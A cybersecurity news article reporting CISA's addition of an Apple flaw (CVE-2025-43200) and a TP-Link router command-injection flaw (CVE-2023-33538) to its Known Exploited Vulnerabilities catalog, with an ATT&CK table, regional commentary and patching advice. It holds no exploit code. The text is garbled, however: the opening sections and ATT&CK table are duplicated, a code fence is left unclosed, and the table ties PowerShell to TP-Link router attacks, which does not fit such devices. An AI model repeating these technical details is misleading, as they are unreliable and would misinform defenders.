The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new actively exploited flaws – impacting Apple devices and TP-Link routers – to its Known Exploited Vulnerabilities (KEV) Catalog, urging immediate mitigation. This update underscores ongoing risks to both federal and global networks, especially amid rising threats targeting consumer and enterprise infrastructure.
On 16 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) expanded its Known Exploited Vulnerabilities (KEV) Catalog with two newly exploited security flaws:
- CVE-2025-43200 – An unspecified vulnerability in multiple Apple products.
- CVE-2023-33538 – A command injection flaw affecting multiple TP-Link router models.
These vulnerabilities meet the KEV criteria under Binding Operational Directive (BOD) 22-01, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaws by assigned deadlines to protect critical infrastructure.
While the BOD legally applies only to U.S. federal agencies, CISA strongly advises all public and private organizations worldwide to patch these issues immediately as part of responsible cybersecurity and vulnerability management practices.
CVE Breakdown: Apple and TP-Link at Risk
CVE-2025-43200 – Apple Devices (Multiple Products)
Although technical details remain undisclosed, this Apple vulnerability has been flagged as actively exploited in the wild, likely affecting a wide array of iOS, macOS, and iPadOS versions.
- Impact: Potential for remote code execution or privilege escalation.
- Risk level: High due to ubiquity of Apple products in enterprise and government environments.
- Current status: Apple has not yet released a public patch as of 16 June 2025.
CVE-2023-33538 — TP-Link Router Command Injection
This older but still widely exploited vulnerability affects multiple TP-Link SOHO routers, typically used in homes and small businesses.
- Vector: Unauthenticated attackers can execute arbitrary OS commands via crafted inputs to vulnerable parameters.
- Affected models: Confirmed across several Archer and TL-WR series routers.
- Mitigation: TP-Link issued firmware patches in late 2023. Devices still unpatched are considered critically vulnerable.
MITRE ATT&CK Mapping & Technical Profile
TTPs and IOCs
| Technique | Description |
|-----------|-------------|
| T1190 | Exploit Public-Facing Application — used in both CVEs to gain initial access |
| T1059.001 | Command and Scripting Interpreter: PowerShell (in TP-Link cases) |
| T1078 | Valid Accounts — possible credential theft from Apple exploit |
| T1105 | Ingress Tool Transfer — likely for malware payloads post-exploitation |
Indicators of Compromise (IOCs): Not publicly released for CVE-2025-43200. TP-Link IOCs include repeated HTTP POST requests to vulnerable CGI scripts and suspicious shell commands in router logs.
CISA Adds Actively Exploited Apple and TP-Link Vulnerabilities to KEV Catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two new actively exploited flaws—impacting Apple devices and TP-Link routers—to its Known Exploited Vulnerabilities (KEV) Catalog, urging immediate mitigation. This update underscores ongoing risks to both federal and global networks, especially amid rising threats targeting consumer and enterprise infrastructure.
---
Two High-Risk Vulnerabilities Under Active Exploitation
On 16 June 2025, the [Cybersecurity and Infrastructure Security Agency (CISA)](https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog) expanded its [Known Exploited Vulnerabilities (KEV) Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) with two newly exploited security flaws:
1. CVE-2025-43200 – An unspecified vulnerability in multiple Apple products.
2. CVE-2023-33538 – A command injection flaw affecting multiple TP-Link router models.
These vulnerabilities meet the KEV criteria under Binding Operational Directive (BOD) 22-01, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the flaws by assigned deadlines to protect critical infrastructure.
While the BOD legally applies only to U.S. federal agencies, CISA strongly advises all public and private organizations worldwide to patch these issues immediately as part of responsible [cybersecurity](https://saintynet.com) and [vulnerability management practices](https://cybercory.com/best-practices).
---
CVE Breakdown: Apple and TP-Link at Risk
CVE-2025-43200 — Apple Devices (Multiple Products)
Although technical details remain undisclosed, this Apple vulnerability has been flagged as actively exploited in the wild, likely affecting a wide array of iOS, macOS, and iPadOS versions.
- Impact: Potential for remote code execution or privilege escalation.
- Risk level: High due to ubiquity of Apple products in enterprise and government environments.
- Current status: Apple has not yet released a public patch as of 16 June 2025.
CVE-2023-33538 — TP-Link Router Command Injection
This older but still widely exploited vulnerability affects multiple TP-Link SOHO routers, typically used in homes and small businesses.
- Vector: Unauthenticated attackers can execute arbitrary OS commands via crafted inputs to vulnerable parameters.
- Affected models: Confirmed across several Archer and TL-WR series routers.
- Mitigation: TP-Link issued firmware patches in late 2023. Devices still unpatched are considered critically vulnerable.
---
MITRE ATT&CK Mapping & Technical Profile
```markdown
TTPs and IOCs
| Technique | Description |
|-----------|-------------|
| T1190 | Exploit Public-Facing Application — used in both CVEs to gain initial access |
| T1059.001 | Command and Scripting Interpreter: PowerShell (in TP-Link cases) |
| T1078 | Valid Accounts — possible credential theft from Apple exploit |
| T1105 | Ingress Tool Transfer — likely for malware payloads post-exploitation |
Indicators of Compromise (IOCs): Not publicly released for CVE-2025-43200. TP-Link IOCs include repeated HTTP POST requests to vulnerable CGI scripts and suspicious shell commands in router logs.
Regional and Global Relevance: Why the MEA Should Pay Attention
Middle East and Africa Exposure
Many MEA organizations, including government agencies, SMEs, and education institutions, rely on consumer-grade routers like TP-Link for connectivity. These devices are often not patched promptly, making them a prime target for threat actors, particularly botnet operators and ransomware affiliates.
The Apple vulnerability is also concerning in BYOD-heavy environments across Africa and the Gulf, where personal Apple devices routinely access corporate and critical infrastructure systems.
“Ignoring known exploited vulnerabilities is no longer just a bad practice—it’s a direct risk to your organization’s resilience,” warns Rami Saad, Middle East Regional Director at SaintyNet Security Services. “The MEA region must adopt a zero-tolerance stance toward delayed patching, especially with KEVs.”
Global Context and Relevance
These additions to the KEV Catalog reflect a growing trend in the cybersecurity landscape: attackers targeting devices at the network edge—routers, mobile phones, and legacy endpoints—rather than hardened enterprise systems.
“Threat actors are opportunistic,” said CISA Director Jen Easterly in a previous alert. “They will exploit any unpatched system, regardless of geography.”
With global ransomware and APT campaigns frequently exploiting KEVs—particularly in phishing and botnet operations—prompt response to catalog updates is essential.
Actionable Takeaways for Defenders and Executives
- Immediately patch affected TP-Link routers or replace them if end-of-life.
- Monitor Apple’s security updates for CVE-2025-43200 patch releases and apply as soon as available.
- Audit network for exposed TP-Link management interfaces and disable WAN access.
- Use network segmentation to isolate BYOD and home office equipment.
- Review MITRE ATT&CK techniques associated with these vulnerabilities for threat-hunting strategies.
- Conduct regular cybersecurity awareness training with emphasis on phishing-based access attempts.
- Subscribe to CISA KEV updates and automate ingestion into your SIEM.
- Adopt a Zero Trust security architecture, particularly for remote access workflows.
- Log and analyze anomalies in network traffic, especially around router endpoints.
- Collaborate with service providers to ensure firmware updates are enforced on managed hardware.
Conclusion: Implications and Outlook
CISA’s addition of these two high-risk vulnerabilities to the KEV Catalog is a wake-up call for organizations across all sectors and geographies. The pace of exploitation is accelerating, and the window between disclosure and real-world attacks is shrinking.
For MEA and global security leaders, proactive vulnerability management must become non-negotiable. As attacks diversify and critical infrastructure becomes more digitized, keeping pace with KEV updates is essential for ensuring resilience in an ever-evolving cybersecurity threat landscape.
